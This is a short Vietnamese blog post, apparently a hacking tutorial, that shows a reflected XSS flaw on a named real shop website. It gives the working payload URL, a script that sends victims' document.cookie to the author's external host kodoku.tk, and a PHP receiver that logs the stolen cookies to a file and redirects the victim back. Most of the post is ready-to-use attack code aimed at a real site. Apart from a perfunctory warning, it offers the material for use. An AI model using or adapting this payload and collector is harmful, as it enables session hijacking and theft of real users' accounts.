[XSS] Ví dụ chôm Cookie

1/1/2018 | Updated: 1/1/1970 | View: 11


Lũ ăn không ngồi rồi đừng dùng đi phá người khác nghe chưa!!!
  Demo tấn công: shopacc24h.vn (chắc fix rồi) Truy cập
https://shopacc24h.vn/?sapxep=
Kèm theo đoạn script đã được encode sẽ thấy lỗi Xss
%3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3E
https://shopacc24h.vn/?sapxep=%3C/script%3E%3Cscript%3E%20alert(%27Xss%27)%3C/script%3E
Ngoài ra, chia sẻ thêm cho anh em cách chôm cookie: Cứ như trên, chèn đoạn script này vào (encode trước khi chèn vào)
<script>
window.location="http://kodoku.tk/test.php?cc="+document.cookie+"&url=http://shopacc24h.vn";
</script>
Sau khi người dùng truy cập đường dẫn, nó sẽ Location đến 1 web mình đã tạo, kèm parameter "cc" và "url". Vậy là tại trang kodoku.tk/test.php ae code 1 đoạn code nhỏ như sau để lưu cookie và location ngược lại url main!
<?php
$myFile = "cookie.txt";
$fh = fopen($myFile, 'a+');
$bien='Cookie: '.$_REQUEST['cc']."|Location: ".$_REQUEST['url']."\n";
fwrite($fh,$bien);
fclose($fh);
echo("<script>window.location='".$_REQUEST['url']."';</script>");
?>
Vậy là cookie của người click link trên đã lưu lại vào file cookie.txt Nguồn: kodoku-san

Tags: ,